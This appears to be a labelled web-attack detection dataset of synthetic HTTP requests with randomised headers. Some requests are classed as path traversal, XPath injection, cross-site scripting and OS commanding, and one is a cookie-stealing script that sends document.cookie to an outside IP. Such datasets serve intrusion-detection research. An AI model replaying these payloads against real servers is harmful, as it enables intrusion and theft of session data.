Accept-Language: coxeR-45uazht;q=0.8, 0ora-Hhfdenpo
Cache-Control: max-age=126
Client-ip: 104.107.235.127
Cookie: igtep=rbzei e;tajh=94219;9pedt8nhbhgk=124;fgmaar8ain=lzu1vAov9my;ithiaj=53
Cookie2: $Version="1"
Date: Wed, 13 Jun 07 07:10:56 CET
ETag: "Uvy.yQT4V-x.0R@WV"
Expect: 100-continue
From: n61i@oGeptigie.biz
If-Modified-Since: Wed, 21 Oct 09 21:36:43 GMT
If-Unmodified-Since: Sat, 17 Nov 07 20:34:38 CET
If-Match: "hDaqmXt3U_WjYmZ"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest qop=tSvsisht
Authorization: NTLM c3Fyb3RpUm1ic1Q1eG9hdHllbkVjaWNlaGFhdGVycmV5Y29hd2xkYWlzc2x1bWxl
Range: -9799,98225-
Referer: /8kcoefse/rncetts/Ewiztira/hr5T.htm
TE: trailers
Trailer: If-Modified-Since
User-Agent: nisg14hi (gIXvmV@; m6kb7q@JL; aigM8V; blr687q)
UA-CPU: PowerPC
UA-Disp: 006,895,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 709x4078
Via: FTP/1.7 251.155.238.247
Transfer-Encoding: identity
Upgrade: yEnTa/2.2, edNa/0.7
Warning: 122 30.172.240.80 "fitmirsEmmaXskma" "Wed, 12 Apr 06 10:10:30 GMT"
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 92243859196
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2223
Start - Id: 45802
class: PathTransversal
GET /asweg3yi/u78ha/ymknr/38nsaseio/mAwg.zmY9_dKDW.aspx?ayJo3alsuoeo=et%27niasr%25accepti+rucMm&eaAl6henLLh=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fanstveat%2Fmaneliitnt%2Fle%2Forvenias.msf&ugvbscriptChpassthruLrX=e%3BfT&e5onSmu=rB0Z8SNk.p&arrh8=4212017&rehvLxmgni=0&omnjd16taemewia=elqaTserrixZudt&srlicntosba3=99139552&ytSblrpe=st9i6&opnrsnhg=e%3Fvbscriptb&aItyo89eo=aO2XfJHE1IOh&pOmcc=ecSxr&mwgetIs=+hh%3Ce0t+awobts&leSteH=ismter&EiQ0nmptvlheeea=lM76mLV HTTP/1.0
Host: www.Ydna4let.fr:80
Connection: Nr0ntqx
Accept: application/x-tar, text/html;q=0.2, application/*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 89.136.143.100
Cookie: roirui=2RG;hhsShctrtn6=bto%a;4t8Qmps=8..1Vuyl;nwnprUlfis=liket;rw=221;Txfsnl3tntshhbJ=16146758
Cookie2: $Version="085"
Date: Wed, 02 Jul 08 24:31:59 GMT
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: mzkc3t@iIdwe.ch
If-Modified-Since: Wed, 10 Mar 04 19:41:27 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "lN4y2yoNZjxbveeM5G"
If-None-Match: *
If-Range: Sun, 14 Jan 07 15:57:04 CET
Max-Forwards: 497
MIME-Version: 2.9
Pragma: oroflvh=7Are
Proxy-Authorization: NTLM ckh0ejB0a2F0aTduaXR2bHNpdG13dG9zNXJsYmxyZnk=
Authorization: Digest qop=bEneli
Range: 151606-
Referer: http://rV4twny.gov/sSnMaciN.wmn
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.8 (X11; U; Linux i586 8.8; ks-re; rv:6.8.1) Gecko/04150181
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9422x259
Via: 3.7 25.113.168.162, FTP/7.2 148.228.246.44
Transfer-Encoding: tiOrc
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45802
Start - Id: 50085
class: XPathInjection
PUT /lCesp4D09BZ/euOqBQ76gBg/ghgh/aS8nWsw-qrXK_x/ttoekshn/ylgjqzf7pbGKykPL/r.AM1/m2u0cRGIYjUK/lra9yhdsaevnnTvdhd/ennFHgClsnnies.png? HTTP/1.0
Content-Length: 12
Content-Language: nif
Content-Encoding: deflate
Content-Location: http://daenie.uk/oadrt/asle.dll
Content-MD5: aUFrYXNkb2V3ZWxuNkRscw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Jan 07 06:56:05 GMT
Last-Modified: Tue, 10 Jan 06 08:34:12 GMT
Host: 112.159.192.124
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 164.91.152.3
Cookie: X8EWCNb8c=(i   <    count(4eb/child::text())  and     j <    count(awon/child::comment()) and   k    < count(2aeyl/child::*) )
Cookie2: $Version="48"
Date: Fri, 10 Mar 06 18:02:24 CET
ETag: "xdk7yyB0QMUo_S1mB"
Expect: 100-continue
From: tbxtam@def4.biz
If-Modified-Since: Tue, 22 Apr 08 11:23:02 CET
If-Unmodified-Since: Tue, 16 Mar 10 04:28:56 UTC
If-Match: "N5OtxcFUBsV.I8Y"
If-None-Match: "PGy2ivEzXHPc_rB3f"
If-Range: *
Max-Forwards: 7198
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic b2ZlZ29uMjptYWll
Authorization: Basic c25nZXc6ZTRraWlHdA==
Range: 618-
Referer: /dhlfri0/pN2nto.swf
TE: deflate,deflate;q=0.7
Trailer: Authorization
User-Agent: hA9o7jZ9h http://www.mtoeeion.st
UA-CPU: x86
UA-Disp: 1584,447,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2565x545
Via: 4.9 www.opaud.css, 1.0 www.a8e2x.jpeg, 5.5 www.re3c6fe.html
Transfer-Encoding: leaat; leeeat=iocl
Upgrade: eeEbe/6.7, haia/3.9, ajjwD/1.2, hlsos2/4.8, o1ae/5.7
Warning: 485 www.arktt0qT.gif:6 "4i7tnbaxl" "Fri, 05 Jan 07 11:21:27 GMT"
X-Forwarded-For: 111.165.36.41
X-Serial-Number: 254807
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xtshh=034095

End - Id: 50085
Start - Id: 46637
class: XSS
GET /hndnt/naobehcnn/es1mabt2izhxtn.cfm?bsncivnsOwtt=dTeR%24ze-%24xIitdeletees+&drf=9&eomtstdatohTes=%40rxc1&Ysi6=cmha&L8phpkSEW=r3ciod%3D-&incKz.5F=h_6kz7VMHFsI&to3=530BeHFv&Rtl0=n+&Osrgrwma6Drr=1&y9sp=yklsebetweenau&ncrek6dgiA=hHt5UH&0rda3omihttiihi=2802062&vayjni0hUdrrh=zjf1noswmda0md&5qdkl=%3Aam8&g.Y0dQQV6perlK1L=7 HTTP/1.0
Host: www.ntNtatta.it
Connection: eaootn
Accept: */*;q=0.4
Accept-Charset: iso-8859-8-i, cp-932;q=0.4, iso-8859-15
Accept-Encoding: <object     classid  ="   clsid:...   " codebase =    "javascript:    [window.open('http://149.216.117.198/larare.jsp'+document.cookie);]     "   >
Accept-Language: *
Cache-Control: no-store
Client-ip: 143.70.138.108
Cookie: e0mhldu1kw5eme=vbse<Ne;Lmrehomop8Ta=u3e;nse7uhttrfMazi8=pmy rRR+flssM
Cookie2: $Version="2"
Date: Mon, 11 Aug 08 06:05:42 CET
ETag: W/"0wuuQ6kxvLWgt@rEZ"
Expect: reChrjl
From: iuaea@cvOyle.it
If-Modified-Since: Mon, 10 Jul 06 13:10:58 GMT
If-Unmodified-Since: Tue, 20 May 08 21:53:50 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Oct 04 21:12:28 GMT
Max-Forwards: 2
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Basic bnJ0bjpndEVmb24=
Range: 118-482,-132
Referer: http://sc5E9dit.st/tnutE/oUueldw.asmx
TE: gzip;q=0.3,trailers
Trailer: Via
User-Agent: 7es66ey1/6.9.9
UA-Pixels: 4819x5235
Via: 0.7 163.142.1.108
Transfer-Encoding: compress
Upgrade: Ecza/9.5
Warning: 274 234.103.99.211 "otEEOe5Kno" "Sun, 01 Jul 07 17:52:41 UTC"
X-Serial-Number: 4075489
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46637
Start - Id: 49090
class: XPathInjection
GET /uoltNlIan5/VxxOSIsLjqOgb/wv14etsi/l-uSt9Ci/ES/DIw7h1MW2/rxnReeebqepxHn/cBsCULpaYwTc6yKFlS_/oE/1OcatHNQhH.js?coma=lCiLKTT&dNYwmVJP=v4mmlidzitnen&tdondgruitc=cnv-sthS3e&oit75zirs9ofsce=%27ml&S-BzR-tNE=yoeKhree%27+or++++1%3C++n%2FetTen%2F8cro%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D17%5D++or+++++%27opeMrgej%27+%3D%27&ynh=hispxyn HTTP/1.0
Host: 172.105.23.180
Connection: eeeaiTkr
Accept: image/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 215.194.111.216
Cookie: hEHz5JG=541;tbnnlbsy=ingni;qgYefNZhVxA=eMmuae WsMt;hthblcW=64989442
Cookie2: $Version="21"
Date: Tue, 19 Jan 10 13:57:05 GMT
ETag: "9zbdhmHRPBJn6NucEb"
Expect: dfeh5=siacsoEI
From: eynba@e3yzoc.com
If-Modified-Since: Fri, 16 Feb 07 09:36:27 CET
If-Unmodified-Since: Wed, 19 Sep 07 08:41:47 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Nov 05 20:50:30 UTC
Max-Forwards: 721
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: TxKj ysmsznno=icasui
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: /taaacdhs.dll
TE: deflate;q=0.9,chunked;q=0.7
Trailer: Referer
User-Agent: rCxDjsmox http://www.uinnbfm.fr
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 8.9 www.fhLf.jpg
Transfer-Encoding: deflate
Upgrade: mtodno/2.6
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49090
Start - Id: 10130
class: Valid
GET /T1Qxok/h8a/hSnTSMysCQpcSc0KvF.pl?tYmwaNsAea=bn&70dDittdeaidr=Aid8khhV4nuuhit&ode4enniw=882839&h67E878oe0=childeT%3B6&oruTePhae=42&iocaawPnilsn=nhb7lemzeutnee9a&ded6thnno=c%2Ft&tsenaxd8xm=03242208&n7aFng=l8yae0style+a HTTP/1.1
Host: 85.64.201.177:80
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.1, x-mac-cyrillic;q=0.2, cp-932, windows-1253
Accept-Encoding: 
Accept-Language: auxPnx-o;q=0.7, oteRI-dnecte, ert-lujwtO;q=0.5, psciiAbk-o
Cache-Control: lrust='ecrtxbgt'
Client-ip: 42.207.99.95
Cookie: tioubiarw=5;siedae7n4aof=t<ee;if=o4qw9O93So6Y
Cookie2: $Version="9"
Date: Thu, 27 Sep 07 09:57:10 GMT
ETag: "HUlhuKB5hI9UJT."
Expect: jpgrt=9vdtd;nsh5uen=mOEto
From: tooao@trne6cted.it
If-Modified-Since: Mon, 26 Mar 07 21:42:04 GMT
If-Unmodified-Since: Tue, 23 Dec 08 14:16:35 CET
If-Match: *
If-None-Match: "vdxNEsMSfJfyUJKC"
If-Range: "YecbLvGinIhxWUowD_"
Max-Forwards: 7
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: ry9n i1al=Masehsi
Range: 374825-,-184
Referer: http://gNtTiE.uk/rsva4Ab/o5gmT/the1eak.css
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: t@Uhbdav http://www.r7yazs.biz
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 012x3228
Via: 2.5 www.olaeadh.css, 6.4 135.170.87.29, FTP/8.5 www.elus.png
Transfer-Encoding: ntaneU; yrrsnipt=aornsrd
Upgrade: oameu/8.0, bsste/1.0
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 17458488534617
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10130
Start - Id: 6600
class: Valid
PUT /hzqR_tWIhXCJi.q/sbGkEsYTniEuPtp/kF1NJob1V/g2d/d2o/bmlIarkaTi3allatiNp/ahaeotefe/C9PhttpgzRYPexec/u.9dXBlsqHnSjiyhqy@c.png? HTTP/1.0
Content-Length: 57
Content-Language: iet,eiuz
Content-Encoding: gzip
Content-Location: /atoFbtT/teps/yl0becyh.sh
Content-MD5: MG9oN3JvYW1MY2V0dzlzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Apr 10 02:28:03 GMT
Last-Modified: Mon, 29 Jun 09 09:47:03 UTC
Host: 43.243.32.225:83105
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 131.30.189.136
Cookie: nhnvzhrety=09;tfe=560360139;eaFle=apd;psR9Y=hnq@m@v;luPTzZ.z0YG=da7nqTdif;asnoosjTeuprhy=lb;
Cookie2: $Version="777"
Date: Tue, 20 Dec 05 14:21:23 CET
ETag: "kUg4am.hFTkJ3y-9fJw"
Expect: ahrs=zriwne;romrer
From: Tiecljrv@r9uruowHsb.de
If-Modified-Since: Tue, 15 Nov 05 17:55:50 CET
If-Unmodified-Since: Thu, 26 Feb 09 18:51:06 UTC
If-Match: *
If-None-Match: "3DjTg9Rl-m.zN12kt"
If-Range: "WD3HDeBQrKa_JSZr"
Max-Forwards: 39
MIME-Version: 5.2
Pragma: f020asel=e
Proxy-Authorization: a6ebai Ihn0pSE=oerspa
Authorization: NTLM bmdlaXBiYm8zdGpvMFBhaW9ldGNyZXA1ZXFlc2V2Ym5vdGVkcnJlRWplNQ==
Range: 540-
Referer: http://www.heqeti.cz/ka0sce6H/sbi2ta.msf
TE: trailers,deflate;q=0.8,gzip;q=0.8
Trailer: Warning
User-Agent: aShh (bBg7hi_W; sY8y4I; nWNnoRj)
UA-CPU: PowerPC
UA-Disp: 3459,8713,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2928x871
Via: 8.2 www.yrMIi.shtml, 8.4 www.suoeuNc.css:8801
Transfer-Encoding: NseOp; 6fnsearr=xhlysuT
Upgrade: mto0a/1.6, eva/7.7, hepn/0.1
Warning: 863 22.42.57.182 "D6ga" 
X-Forwarded-For: 75.123.215.86
X-Serial-Number: 43970651738336527001
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cmcedwnptse=iscriptesEnrn2tnrsysteme&oh=remIr&Me5elHnkl

End - Id: 6600
Start - Id: 43740
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.paeso.uk
Connection: re9atc
Accept: */*;q=0.1
Accept-Charset: windows-1251, cp-936
Accept-Encoding: deflate, identity, identity, compress;q=0.8, deflate;q=0.2
Accept-Language: Tn9-rrAz;q=0.3, 0Nt-Mn2s;q=0.2, pcee-Ormeipai;q=0.7
Cache-Control: no-transform
Client-ip: 42.85.153.5
Cookie: atoe=86497;en50tera=rtttometa+g;irleRsia=fatnfoenyatl1;irm=reM5CV4vfK;e7qilM8xs1r2s=sroi%utdmh;3us15oan8=fcetosycu2asn
Cookie2: $Version="25"
Date: Fri, 19 Jan 07 23:58:09 UTC
ETag: W/"MJRYeoM9MNrdpNUXW"
Expect: e5yilnee=dPfoEs
From: m8Lou@dteama.it
If-Modified-Since: Sun, 11 Mar 07 07:15:10 CET
If-Unmodified-Since: Fri, 09 Sep 05 02:51:57 GMT
If-Match: "5Ca07Mlw.icw.VCsV"
If-None-Match: "C44_2ewKp4rlrikc2Y"
If-Range: Sat, 29 Nov 08 10:17:49 GMT
Max-Forwards: 604
MIME-Version: 0.1
Pragma: eo='yminAhur'
Proxy-Authorization: rguud skwsaiq=hCtyg
Authorization: Basic amVyYWNSOnV0ZWg=
Range: 24481-,44476-
Referer: /dh2irn/BBb8t/tShhO/tNNUns/bemej4ne.exe
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: srttnE/5.9.6
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 337x2229
Via: 5.7 42.114.199.231, Erns/0.5 www.dfee4d.htm, 2.8 www.yo3t.tiff
Transfer-Encoding: deflate
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 5495098139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43740
Start - Id: 4161
class: Valid
POST /craeni.mspx? HTTP/1.0
Content-Length: 235
Content-Language: nays
Content-Encoding: compress
Content-Location: /yteI/u6viH/Ectmle/tiohdwe.dll
Content-MD5: dXc1YWllcWM0c29lczFrZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Mar 10 10:39:23 CET
Last-Modified: Mon, 29 Nov 04 09:42:12 CET
Host: www.mDu0E.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: diIleT-ad, nZ-coo, kCemlmh-oo2Tc;q=0.7, acd-cao;q=0.0, hiirifm-ehm;q=0.2
Cache-Control: min-fresh=46850
Client-ip: 27.207.2.84
Cookie: ss=78893218
Cookie2: $Version="772"
Date: Thu, 28 Feb 08 21:07:06 GMT
ETag: W/"TOzFfs1syesKdnln"
Expect: hjEoi=mo2dsl
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Fri, 21 Mar 08 10:15:02 UTC
If-Unmodified-Since: Tue, 09 Jun 09 15:19:32 GMT
If-Match: "2uL4crWCYX8BIik7D3o"
If-None-Match: "nImZHRa8Txpoghq6"
If-Range: Sun, 23 May 04 02:50:34 UTC
Max-Forwards: 812
MIME-Version: 3.7
Pragma: tits=tsolbyx
Proxy-Authorization: NTLM dUg3bXQxdWl1b2VJZVFtZmlvckNibkllYXVuc2NkaHJyMDFwZQ==
Authorization: NTLM aG9hbHRDY2F0ZGVucmV0c0FsZW9xaHJpZ2Q3YWx0MmFJbGFlaGRhOQ==
Range: -9,-905
Referer: /ecjtE/osjyeU/nktk/sya6.css
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (X11; U; Linux i386 1.3; ah-9i; rv:1.8.8) Gecko/07629779
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 872x878
Via: FTP/4.3 173.1.82.222, FTP/1.4 www.dgazy3.js, 8.3 www.tl1ese.htm
Transfer-Encoding: 8dxl; 5dnNetcr=aiefuy
Upgrade: ahpr/8.4, iraUdd/9.2, cnc6/0.3
Warning: 033 www.ht6forRg.shtml "vwcfh1evolhtnobct" 
X-Forwarded-For: 182.55.25.220
X-Serial-Number: 5833814723
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ddaslna=hntwhat h CA&azf=510&rw=0Pm4brx20&x0AGjhciisdtrr=tn0zvomaifz3dmlola&rsueaa3iu=<ee9unS3l&trrt=otn&Hnb=jn&niiaoteltoooous=yoh&TmNolCP=582821&aHh1nENZ=09&nEnn=du4aEmsiotr2clr&lsiediiardi=uoaunties5r&i6Oa3=124356&eagPscnIn0lx=uda

End - Id: 4161
Start - Id: 17223
class: Valid
GET /orzY@IUl_Ovaboot.inioptnx/toateg6/Rxpsock_stream6PpdX0aAd/ybWKFFUr.RVw2/H0a2Mt.jpeg?ewebsOcrmkasaan=913635679 HTTP/1.1
Host: 37.123.218.217
Connection: close
Accept: text/html, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: eNaLHv73-5mi3a
Cache-Control: max-age=8
Client-ip: 233.150.95.107
Cookie: positionXJechoa-bodykdocumentbetween=40;ymaeoatl3s=2369244;3eamndEmas9l=144847
Cookie2: $Version="005"
Date: Tue, 21 Aug 07 21:36:38 GMT
ETag: "IvDSXhdQgL69PXba7C6"
Expect: te8thift
From: tytiiae@0oytu.it
If-Modified-Since: Sun, 20 Mar 05 02:53:15 GMT
If-Unmodified-Since: Wed, 20 Feb 08 15:09:40 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Mar 05 21:41:05 UTC
Max-Forwards: 5300
MIME-Version: 6.4
Pragma: tnnk=e5roero
Proxy-Authorization: NTLM bmx0YTA2dGVkcDkwdHNzdG51ZHNoZTNuZG5obWJhYXJvcmRtZg==
Authorization: Digest qop=auth
Range: 601-
Referer: /athsaB/lawat.swf
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: erfmt (y5QLkYsgn; 7c5ExvFwD; dxzkad@2-)
UA-CPU: StrongARM
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 0.5 111.239.254.204:338, 7.1 www.bmeuEdu.tiff, 7.4 28.91.114.39:07112
Transfer-Encoding: identity
Upgrade: ezft/4.3, hgob/9.9, uqy1/8.3, lh5t/1.6, Das8c/2.5
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 534738047598763
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17223
Start - Id: 25498
class: Valid
GET /nt/FperlnFsB/zirsutr3H1sv/6H@ihttpsN4bgsoundcM/ate41h/ohmEuioeeutn/4pw2y0Dft91/n0mE/8KcE3Qb9A.tiff?Na=o&Jnhpefxru0inb3m=tG9ctlVeOtOfaito3&t5krnoe3Pfu=fXPDh7b.&eo4=veaU&sHvfkAadmin=u5X4hg6q&asGbBjtr=7aiidrooaa9jld&vzanvh=4167&elppssyh=0&r0reutusfhleept=69387074&gswr=execl2mM&leirlC=042772333&ti=onpaallmiN9&Tb=hf0FUAb-&mszrn7vj=ttuireplacerntoduietelnets&otQteq=68472 HTTP/1.1
Host: www.p4oinneD.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, gzip
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 83.25.232.183
Cookie: le=x1Q5;dpltewlnseepyu=Ao;qtu0eeeaohdSee= execil/ 2systemlibe8vbscriptsot;usalpsyaimtn=6029817;ftp51AG285R=esns
Cookie2: $Version="05"
Date: Thu, 16 Nov 06 09:31:15 UTC
ETag: "xeMHXS.UEEH_vcbqUX"
Expect: 100-continue
From: hhexy@ieecah.it
If-Modified-Since: Wed, 07 May 08 19:04:15 GMT
If-Unmodified-Since: Thu, 25 Jan 07 14:53:45 UTC
If-Match: "vz0ajy6.xCr2mb7n"
If-None-Match: *
If-Range: Mon, 24 Jul 06 20:56:20 CET
Max-Forwards: 1
MIME-Version: 7.5
Pragma: tinscij='nhpS90uo'
Proxy-Authorization: ptss fnjE=diionlr
Authorization: swanct ll8yn=1esi
Range: 95-099091,5-
Referer: /eathedze/4ojtw/kntuo3k.nsf
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/7.3 (X11; U; SunOS sun4u 2.8; di-1e; rv:2.1.3) Gecko/57343831
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: FTP/4.4 20.194.111.17, 9.2 www.sito6.jpg:46, FTP/9.0 203.63.180.32
Transfer-Encoding: gzip
Upgrade: ownr/0.4
Warning: 913 www.taBOb.html "tmfrufAeznpcrlreef" "Sat, 23 Jun 07 12:59:22 CET"
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 91549794
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25498
Start - Id: 32286
class: Valid
GET /tNS/VBXED3p7bo3/e6IO_80h@xcpfJcedEg/uVonIdcmpztee0zi/esregn4relvaEyr2ntc/qpgeclHpc/vaittAtdf7/M6.BX/d5/ulmnr.asp?0tonohwtshs1ibd=rWY&8art1=%29sock_stream+anull&SIQRwp-sIM=gp&Rr2x5lsj7=euref&yafshkl=8uhvahU&xtDano=escript%3Dvmeied3da&ht3e=tPfbKspDvg&UpQOWT=suag+iodpcautoexec0a%25w+xtermtzro HTTP/1.0
Host: www.feczs.org
Connection: gsmru
Accept: text/*, text/xml;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s-kigsb;q=0.1, hD2eath8-nos0tg, f-n
Cache-Control: only-if-cached
Client-ip: 51.53.237.152
Cookie: ladkrtomoogrcos=rqtoeno7ruipassthrualq@oji;ujlike0ddJp.h=taDEktNLescr7c;nftaEtra=amwef3seteio
Cookie2: $Version="02"
Date: Sun, 14 Dec 08 12:02:59 CET
ETag: "5PC@hhpJ@Jsu8Oiv"
Expect: 3zih
From: mnonn5h@wlv1.be
If-Modified-Since: Mon, 13 Dec 04 02:38:21 CET
If-Unmodified-Since: Wed, 29 Dec 04 21:29:08 GMT
If-Match: "BmyFI-M1WX9bR1vh"
If-None-Match: *
If-Range: Fri, 15 May 09 24:47:07 CET
Max-Forwards: 6277
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: Basic cm9hb3RsdTplb3dIZQ==
Range: -05910,24859-707033
Referer: /8vuenn1/gsiato/eborieHp.dll
TE: trailers,trailers,deflate;q=0.5
Trailer: Date
User-Agent: Mozilla/0.1 (Windows; U; Win98 5.1; Sa-5d; rv:5.7.2) Gecko/74213314
UA-CPU: x86
UA-Disp: 096,809,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3225x292
Via: 9.0 18.154.143.137
Transfer-Encoding: gzip
Upgrade: igmn0b/4.9, aorfth/1.2, srr/7.4, mp7/8.9, npq/6.9
Warning: 188 128.175.35.78:84438 "S5oiobSrnbBr6fnyRoo" "Thu, 12 Oct 06 18:58:00 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 7859774427
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32286
Start - Id: 7536
class: Valid
PUT /HFlf/oAa/a3REo7Ttnk3e3eneino/slhigR.mspx? HTTP/1.1
Content-Length: 20
Content-Language: Phah2,eKk
Content-Encoding: gzip
Content-Location: /misp/j7rn/eosnSl.sh
Content-MD5: cHdZZ2Fvem1zc29vdGVrYg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Oct 09 12:31:42 CET
Last-Modified: Sat, 31 Mar 07 23:38:43 UTC
Host: www.1e7e.biz
Connection: keep-alive
Accept: application/*;q=0.2, application/zip
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: sd-eef, o8orcupn-xro, TsuCO7uy-seqniE;q=0.7, o-3Sr;q=0.9
Cache-Control: only-if-cached
Client-ip: 175.161.119.11
Cookie: sput0disEtwly6=llnta5;agnauuvth=jyhS21BX;pa=dONDkjT;Ms2ihhaisxnet=\h:gii
Cookie2: $Version="208"
Date: Sun, 25 Jul 04 12:19:17 CET
ETag: "Gkl0tmFfoOusxWAOw"
Expect: Apt3G=woubl;kwsrg=oguten
From: tedca@tnDTs3lE.org
If-Modified-Since: Mon, 08 Mar 10 17:13:05 GMT
If-Unmodified-Since: Sun, 25 Nov 07 17:19:18 UTC
If-Match: *
If-None-Match: "3kxSgUN5GwURvvZAxa"
If-Range: *
Max-Forwards: 27
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic c2lmczpodWhyZQ==
Authorization: Digest response="9CeC54Fc430B88ebd12B3fDd319A6EBa"
Range: 31105-
Referer: http://iTaeglc.biz/iwdaSrc/rEjber.mspx
TE: trailers,trailers,chunked;q=0.6
Trailer: Via
User-Agent: tsNldlrbHl (xCYpiviE; siH8V0H; tCaQ8W; thhIhU)
UA-CPU: x86
UA-Disp: 8435,1661,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 607x1532
Via: 6.6 127.130.33.229, nnpve/6.9 185.224.152.189
Transfer-Encoding: deflate
Upgrade: snu/9.1, l0m/9.5, rlnstR/7.1
Warning: 213 www.eoskA.jpeg "y0tdoaExi3ntiraf0N7n" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 38021962558581
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ehuollDlnEsd=heemNhr

End - Id: 7536
Start - Id: 1757
class: Valid
